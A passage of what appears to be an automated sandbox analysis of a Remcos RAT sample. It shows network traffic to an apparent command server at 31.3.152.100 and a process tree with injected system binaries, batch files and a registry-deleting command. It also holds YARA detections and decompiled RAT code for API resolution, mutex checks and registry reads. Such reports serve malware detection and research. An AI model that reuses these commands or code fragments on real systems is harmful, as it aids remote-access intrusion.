                    Sep 22, 2021 22:04:16.882167101 CEST  49832        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:16.891272068 CEST  49832        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:17.055269957 CEST  54614        49832      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:18.201539993 CEST  49833        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:18.354060888 CEST  54614        49833      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:18.354255915 CEST  49833        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:18.358721018 CEST  49833        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:18.514497995 CEST  54614        49833      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:19.651118994 CEST  49834        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:19.802769899 CEST  54614        49834      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:19.802911997 CEST  49834        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:19.815547943 CEST  49834        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:19.963790894 CEST  54614        49834      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:19.963927031 CEST  49834        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:19.966003895 CEST  54614        49834      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:21.105460882 CEST  49836        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:21.261703014 CEST  54614        49836      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:21.261954069 CEST  49836        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:21.271070957 CEST  49836        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:21.455341101 CEST  54614        49836      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:21.455466032 CEST  49836        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:21.705183029 CEST  49836        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:21.857218027 CEST  54614        49836      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:22.620297909 CEST  49843        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:22.771507025 CEST  54614        49843      31.3.152.100  192.168.2.5
                    Sep 22, 2021 22:04:22.772147894 CEST  49843        54614      192.168.2.5   31.3.152.100
                    Sep 22, 2021 22:04:22.795237064 CEST  49843        54614      192.168.2.5   31.3.152.100

                    UDP Packets


                    DNS Queries


                    DNS Answers


                    Code Manipulations

                    Statistics

                    CPU Usage

                    Memory Usage

                    High Level Behavior Distribution

                    Behavior

                    System Behavior

                    General

                    Start time: 22:02:06
                    Start date: 22/09/2021
                    Path: C:\Users\user\Desktop\ZfigYV6HXd.exe
                    Wow64 process (32bit): true
                    Commandline: 'C:\Users\user\Desktop\ZfigYV6HXd.exe'
                    Imagebase: 0x400000
                    File size: 1017856 bytes
                    MD5 hash: 1A1A9B3969ABCD2FCCD2C6CE20BE68AC
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: Borland Delphi
                    Reputation: low

                    General

                    Start time: 22:02:34
                    Start date: 22/09/2021
                    Path: C:\Windows\SysWOW64\logagent.exe
                    Wow64 process (32bit): true
                    Commandline: C:\Windows\System32\logagent.exe
                    Imagebase: 0xe40000
                    File size: 86016 bytes
                    MD5 hash: E2036AC444AB4AD91EECC1A80FF7212F
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.519137260.0000000003017000.00000004.00000020.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Author: unknown
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp, Author: unknown
                    Reputation: moderate

                    General

                    Start time: 22:02:39
                    Start date: 22/09/2021
                    Path: C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit): true
                    Commandline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
                    Imagebase: 0x150000
                    File size: 232960 bytes
                    MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Reputation: high

                    General

                    Start time: 22:02:40
                    Start date: 22/09/2021
                    Path: C:\Windows\System32\conhost.exe
                    Wow64 process (32bit): false
                    Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase: 0x7ff7ecfc0000
                    File size: 625664 bytes
                    MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Reputation: high

                    General

                    Start time: 22:02:41
                    Start date: 22/09/2021
                    Path: C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit): true
                    Commandline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                    Imagebase: 0x150000
                    File size: 232960 bytes
                    MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Reputation: high

                    General

                    Start time: 22:02:42
                    Start date: 22/09/2021
                    Path: C:\Windows\System32\conhost.exe
                    Wow64 process (32bit): false
                    Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase: 0x7ff7ecfc0000
                    File size: 625664 bytes
                    MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Reputation: high

                    General

                    Start time: 22:02:42
                    Start date: 22/09/2021
                    Path: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe
                    Wow64 process (32bit): true
                    Commandline: 'C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe'
                    Imagebase: 0x400000
                    File size: 1017856 bytes
                    MD5 hash: 1A1A9B3969ABCD2FCCD2C6CE20BE68AC
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: Borland Delphi
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 27%, ReversingLabs
                    Reputation: low

                    General

                    Start time: 22:02:42
                    Start date: 22/09/2021
                    Path: C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit): true
                    Commandline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
                    Imagebase: 0x150000
                    File size: 232960 bytes
                    MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Reputation: high

                    General

                    Start time: 22:02:43
                    Start date: 22/09/2021
                    Path: C:\Windows\System32\conhost.exe
                    Wow64 process (32bit): false
                    Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase: 0x7ff7ecfc0000
                    File size: 625664 bytes
                    MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Reputation: high

                    General

                    Start time: 22:02:43
                    Start date: 22/09/2021
                    Path: C:\Windows\SysWOW64\reg.exe
                    Wow64 process (32bit): true
                    Commandline: reg delete hkcu\Environment /v windir /f
                    Imagebase: 0xac0000
                    File size: 59392 bytes
                    MD5 hash: CEE2A7E57DF2A159A065A34913A055C2
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Reputation: high

                    General

                    Start time:22:02:44
                    Start date:22/09/2021
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7ecfc0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    General

                    Start time:22:02:50
                    Start date:22/09/2021
                    Path:C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe'
                    Imagebase:0x400000
                    File size:1017856 bytes
                    MD5 hash:1A1A9B3969ABCD2FCCD2C6CE20BE68AC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:Borland Delphi

                    General

                    Start time:22:03:18
                    Start date:22/09/2021
                    Path:C:\Windows\SysWOW64\mobsync.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\mobsync.exe
                    Imagebase:0xb50000
                    File size:93184 bytes
                    MD5 hash:44C19378FA529DD88674BAF647EBDC3C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Author: unknown
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.417356547.0000000002D18000.00000004.00000020.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.417466186.0000000010590000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000002.417466186.0000000010590000.00000040.00000001.sdmp, Author: unknown

                    General

                    Start time:22:03:27
                    Start date:22/09/2021
                    Path:C:\Windows\SysWOW64\logagent.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\logagent.exe
                    Imagebase:0xe40000
                    File size:86016 bytes
                    MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp, Author: unknown
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.437204734.0000000003297000.00000004.00000020.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.437522537.0000000010590000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000020.00000002.437522537.0000000010590000.00000040.00000001.sdmp, Author: unknown

                    Disassembly

                    Code Analysis


                      Executed Functions

                      Non-executed Functions

                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000003.272327382.00000000032F4000.00000004.00000001.sdmp, Offset: 032F4000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: l.@$p.@$p.@$3C
                      • API String ID: 0-542283486
                      • Opcode ID: c8a749997cf1c26def18ea4b0fc89dc5befe63049a7e31b985774c4fe61c331a
                      • Instruction ID: 125b0982d3aaaf484d858b6d10e26b0829a473ec50c17be4bca8e5260f302a1c
                      • Opcode Fuzzy Hash: c8a749997cf1c26def18ea4b0fc89dc5befe63049a7e31b985774c4fe61c331a
                      • Instruction Fuzzy Hash: 2A415D34530701AEE731FE26C908B23F5E9AB00758F248A3ED3A69A6D4D7F599C48784
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Executed Functions

                      C-Code - Quality: 100%
                      			E0040CD09() {
                      				struct HINSTANCE__* _t1;
                      				_Unknown_base(*)()* _t2;
                      				_Unknown_base(*)()* _t24;
                      
                      				_t1 = LoadLibraryA("Psapi.dll"); // executed
                      				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
                      				 *0x46bd2c = _t2;
                      				if(_t2 == 0) {
                      					 *0x46bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                      				}
                      				 *0x46bd1c = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
                      				if( *0x46bd2c == 0) {
                      					 *0x46bd1c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                      				}
                      				 *0x46bd24 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
                      				 *0x46bd10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                      				 *0x46beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                      				 *0x46beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
                      				 *0x46bd20 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
                      				 *0x46bd14 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
                      				 *0x46bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
                      				 *0x46bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
                      				 *0x46bd18 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
                      				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                      				 *0x46bb04 = _t24;
                      				return _t24;
                      			}

                      Instruction addresses: 0x0040cd1c, 0x0040cd25, 0x0040cd2d, 0x0040cd34, 0x0040cd45, 0x0040cd45, 0x0040cd60, 0x0040cd65, 0x0040cd76, 0x0040cd76, 0x0040cd94, 0x0040cda8, 0x0040cdbc, 0x0040cdd0, 0x0040cde4, 0x0040cdf8, 0x0040ce0c, 0x0040ce20, 0x0040ce31, 0x0040ce39, 0x0040ce3d, 0x0040ce43

                      APIs
                      • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00000000,Octopus-GM39UT,00000001,0040C505), ref: 0040CD1C
                      • GetProcAddress.KERNEL32(00000000), ref: 0040CD25
                      • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040CD40
                      • GetProcAddress.KERNEL32(00000000), ref: 0040CD43
                      • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040CD54
                      • GetProcAddress.KERNEL32(00000000), ref: 0040CD57
                      • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040CD71
                      • GetProcAddress.KERNEL32(00000000), ref: 0040CD74
                      • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040CD85
                      • GetProcAddress.KERNEL32(00000000), ref: 0040CD88
                      • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040CD99
                      • GetProcAddress.KERNEL32(00000000), ref: 0040CD9C
                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040CDAD
                      • GetProcAddress.KERNEL32(00000000), ref: 0040CDB0
                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040CDC1
                      • GetProcAddress.KERNEL32(00000000), ref: 0040CDC4
                      • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040CDD5
                      • GetProcAddress.KERNEL32(00000000), ref: 0040CDD8
                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040CDE9
                      • GetProcAddress.KERNEL32(00000000), ref: 0040CDEC
                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040CDFD
                      • GetProcAddress.KERNEL32(00000000), ref: 0040CE00
                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040CE11
                      • GetProcAddress.KERNEL32(00000000), ref: 0040CE14
                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040CE25
                      • GetProcAddress.KERNEL32(00000000), ref: 0040CE28
                      • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040CE36
                      • GetProcAddress.KERNEL32(00000000), ref: 0040CE39
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: AddressProc$HandleModule$LibraryLoad
                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Octopus-GM39UT$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
                      • API String ID: 551388010-1666371535
                      • Opcode ID: 9e74a4b7297bf2b2a58517a95ccdf4e1be594d5622eed8d1bc547594be329630
                      • Instruction ID: 7f0a72ef543637f7c74f83f283374f20c8e911501c3ee670a040c0af445c8e1c
                      • Opcode Fuzzy Hash: 9e74a4b7297bf2b2a58517a95ccdf4e1be594d5622eed8d1bc547594be329630
                      • Instruction Fuzzy Hash: 1F21AEA0E8135875D620BBB29C49E1B2E58DA44B95B204927F205D7191FFFCC540CEEF
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00410885: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
                        • Part of subcall function 00410885: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
                        • Part of subcall function 00410885: RegCloseKey.KERNELBASE(?), ref: 004108CE
                      • Sleep.KERNELBASE(00000BB8), ref: 0040D169
                      • ExitProcess.KERNEL32 ref: 0040D1DE
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseExitOpenProcessQuerySleepValue
                      • String ID: 3.2.1 Pro$override$pth_unenc
                      • API String ID: 2281282204-2083519672
                      • Opcode ID: e8eef23d0450733ddffb4ed0590df9d184fd0f0211c19a2a612e1f43d34f4dff
                      • Instruction ID: 08f4d26337d929cf8c522b5db6824f2b5f74010f43e1cc258f687c08e2209bf0
                      • Opcode Fuzzy Hash: e8eef23d0450733ddffb4ed0590df9d184fd0f0211c19a2a612e1f43d34f4dff
                      • Instruction Fuzzy Hash: 45212731F443012BD608B6B68C57B6F32969B80708F10042FB8066B2D2FEBDDA45879F
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000001,?,0042E381,00000024,?,00000000,?), ref: 0042E5DF
                      • CryptGenRandom.ADVAPI32(00000000,00000000,?,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3), ref: 0042E5F4
                      • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3,?), ref: 0042E606
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Crypt$Context$AcquireRandomRelease
                      • String ID:
                      • API String ID: 1815803762-0
                      • Opcode ID: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
                      • Instruction ID: 38117f8ee5779777ede6d5b7ba3ea51b7ecd80fb833ca9539c352c605c5c0cae
                      • Opcode Fuzzy Hash: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
                      • Instruction Fuzzy Hash: 46F06D31318324BBEB310F56FC19F573E99EB81BA6FA00536F209E50E4E6628940865C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetComputerNameExW.KERNEL32(00000001,?,00000028,0046C578), ref: 00416DBB
                      • GetUserNameW.ADVAPI32(?,00000037), ref: 00416DD3
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Name$ComputerUser
                      • String ID:
                      • API String ID: 4229901323-0
                      • Opcode ID: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
                      • Instruction ID: 97ef4402937901d3963fe518a4296ad78cd3b90a883e9fb2300271c61e114a9f
                      • Opcode Fuzzy Hash: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
                      • Instruction Fuzzy Hash: 38014F7190011CABCB00EB90DC45EDDB7BCEF44305F10016AF905B2196EEB46A898B98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: recv
                      • String ID:
                      • API String ID: 1507349165-0
                      • Opcode ID: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
                      • Instruction ID: e48ef5bedcc115dfdcbe715373a672fa69d6f329cf61ba9e4e3f48fb4f6a798c
                      • Opcode Fuzzy Hash: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
                      • Instruction Fuzzy Hash: 9DC02B3900420CBFCF011FA0CD0CCBD3FADD7443517008024F90102251C533C62097A4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SetUnhandledExceptionFilter.KERNELBASE(Function_0002F8C5,0042F5A8), ref: 0042F8BE
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
                      • Instruction ID: 86e206407557d0ac1bda88e2f45e42cbf33a4e9732861bd4a6740e282559d687
                      • Opcode Fuzzy Hash: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
                      • Instruction Fuzzy Hash:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E0040C2BE(void* __edx, void* __eflags, intOrPtr _a4, char* _a12) {
                      				char _v524;
                      				char _v700;
                      				char _v720;
                      				char _v724;
                      				char _v728;
                      				char _v744;
                      				char _v756;
                      				char _v760;
                      				char _v772;
                      				struct _SECURITY_ATTRIBUTES* _v776;
                      				signed int _v780;
                      				char _v784;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t71;
                      				void* _t78;
                      				void** _t86;
                      				void* _t90;
                      				CHAR* _t93;
                      				long _t95;
                      				int _t97;
                      				char _t100;
                      				void* _t101;
                      				void* _t105;
                      				void* _t121;
                      				void* _t122;
                      				void* _t129;
                      				char _t135;
                      				char* _t137;
                      				signed char* _t139;
                      				signed char* _t141;
                      				void* _t144;
                      				void* _t146;
                      				void* _t160;
                      				void* _t163;
                      				intOrPtr _t165;
                      				void* _t166;
                      				intOrPtr _t182;
                      				intOrPtr* _t185;
                      				void* _t187;
                      				void* _t193;
                      				char* _t196;
                      				void* _t199;
                      				char* _t203;
                      				void* _t210;
                      				signed short* _t214;
                      				void* _t215;
                      				void* _t216;
                      				signed int _t217;
                      				CHAR* _t224;
                      				void* _t226;
                      				char* _t229;
                      				char* _t231;
                      				intOrPtr* _t233;
                      				void* _t235;
                      				intOrPtr* _t240;
                      				intOrPtr* _t244;
                      				void* _t246;
                      				void* _t254;
                      				void* _t265;
                      				void* _t268;
                      				struct _SECURITY_ATTRIBUTES* _t269;
                      				int _t272;
                      				char* _t360;
                      				signed int _t382;
                      				signed int _t386;
                      				int _t388;
                      				signed int _t394;
                      				signed int _t397;
                      				intOrPtr _t423;
                      				void* _t433;
                      				void* _t435;
                      				signed int _t452;
                      				void* _t455;
                      				char* _t461;
                      				void* _t462;
                      				char* _t465;
                      				void* _t467;
                      				void* _t472;
                      				char* _t477;
                      				intOrPtr* _t481;
                      				void* _t484;
                      				void* _t485;
                      				void* _t486;
                      				signed int _t492;
                      				void* _t495;
                      				void* _t496;
                      				void* _t497;
                      				void* _t499;
                      				void* _t501;
                      				void* _t502;
                      				void* _t506;
                      
                      				_t444 = __edx;
                      				 *0x46bd28 = _a4;
                      				_push(_t268);
                      				E0040CC55( &_v724, __edx, __eflags); // executed
                      				_t495 = (_t492 & 0xfffffff8) - 0x2f4;
                      				E004020EC(_t268, _t495, __edx, __eflags, 0x46c59c);
                      				_t496 = _t495 - 0x18;
                      				E004020EC(_t268, _t496, __edx, __eflags,  &_v728);
                      				_t71 = E00417478( &_v756, __edx); // executed
                      				_t497 = _t496 + 0x30;
                      				E0040D458(__edx, _t71);
                      				L00401E74( &_v760, __edx);
                      				_t284 = _a12;
                      				if( *_a12 != 0x2d) {
                      					L6:
                      					_t461 = 0x46c578;
                      					__eflags =  *((char*)(L00401F95(L00401E49(0x46c578, _t444, __eflags, 3))));
                      					 *0x46bb01 = __eflags != 0;
                      					_t78 = E00405343(_t268,  &_v756, E004075E6( &_v780, "Software\\", __eflags, L00401E49(0x46c578, _t444, __eflags, 0xe)), 0x46c578, __eflags, "\\");
                      					_t471 = 0x46c518;
                      					L00401FD1(0x46c518, _t77, 0x46c518, _t78);
                      					L00401FC7();
                      					L00401FC7();
                      					E00405A0B(_t268, 0x46c5cc, "Exe");
                      					_t269 = 0;
                      					L00401E49(0x46c578, _t77, __eflags, 0x32);
                      					__eflags =  *(E00405220(0));
                      					 *0x46bd4e = __eflags != 0;
                      					L00401E49(0x46c578, _t77, __eflags, 0x33);
                      					_t86 = E00405220(0);
                      					__eflags =  *_t86;
                      					 *0x46bd4f =  *_t86 != 0;
                      					__eflags =  *0x46bd4e - _t269; // 0x0
                      					if(__eflags == 0) {
                      						L8:
                      						_v776 = _t269;
                      						_t472 = OpenMutexA(0x100000, _t269, "Remcos_Mutex_Inj");
                      						__eflags = _t472;
                      						if(_t472 != 0) {
                      							WaitForSingleObject(_t472, 0xea60);
                      							CloseHandle(_t472);
                      						}
                      						_t447 = L00401F95(0x46c518); // executed
                      						_t90 = E00410885(_t89, "Inj",  &_v776); // executed
                      						__eflags = _t90;
                      						if(__eflags != 0) {
                      							_t447 = L00401F95(0x46c518);
                      							L00410CE2(_t259, __eflags, "Inj");
                      						}
                      						L00401FAD(0x46c548, L00401E49(_t461, _t447, __eflags, 0xe));
                      						_t93 = L00401F95(0x46c548);
                      						_t462 = 0;
                      						_t272 = 1;
                      						CreateMutexA(0, 1, _t93); // executed
                      						_t95 = GetLastError();
                      						__eflags = _t95 - 0xb7;
                      						if(_t95 == 0xb7) {
                      							L45:
                      							L00401FC7();
                      							_t97 = _t272;
                      							goto L5;
                      						} else {
                      							E0040CD09();
                      							GetModuleFileNameW(0, "C:\Windows\SysWOW64\logagent.exe", 0x104);
                      							_t100 = E00417614(0x46c548);
                      							_push(0x46c548);
                      							_t448 = 0x80000002;
                      							 *0x46beb4 = _t100;
                      							_t101 = E004108E2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
                      							_t499 = _t497 + 0xc;
                      							L00401FD1(0x46c5b4, 0x80000002, 0x46c5b4, _t101);
                      							L00401FC7();
                      							__eflags =  *0x46beb4;
                      							if( *0x46beb4 == 0) {
                      								_push(" (32 bit)");
                      							} else {
                      								_push(" (64 bit)");
                      							}
                      							E00405A02(_t272, 0x46c5b4, _t462);
                      							_t105 =  *0x46bd20;
                      							__eflags = _t105;
                      							if(_t105 != 0) {
                      								 *0x46a9d0 =  *_t105();
                      							}
                      							_t477 = 0x46c578;
                      							__eflags = _v776 - _t462;
                      							if(__eflags == 0) {
                      								_t433 = L00401E49(0x46c578, _t448, __eflags, 0x2e);
                      								__eflags =  *((char*)(L00401F95(_t433)));
                      								if(__eflags != 0) {
                      									__eflags =  *0x46bd20 - _t462; // 0x7614e630
                      									if(__eflags != 0) {
                      										__eflags =  *0x46a9d0 - _t462; // 0x1
                      										if(__eflags == 0) {
                      											_t448 = L00401F95(0x46c518);
                      											_t254 = E0041083B(0x46c518, _t253, "origmsc");
                      											_pop(_t435);
                      											__eflags = _t254;
                      											if(__eflags == 0) {
                      												L00405F77(_t272, _t435, _t448);
                      											}
                      										} else {
                      											_push(_t433);
                      											_push(_t433);
                      											__eflags = E0040A713() - 0xffffffff;
                      											if(__eflags == 0) {
                      												E00406071(__eflags);
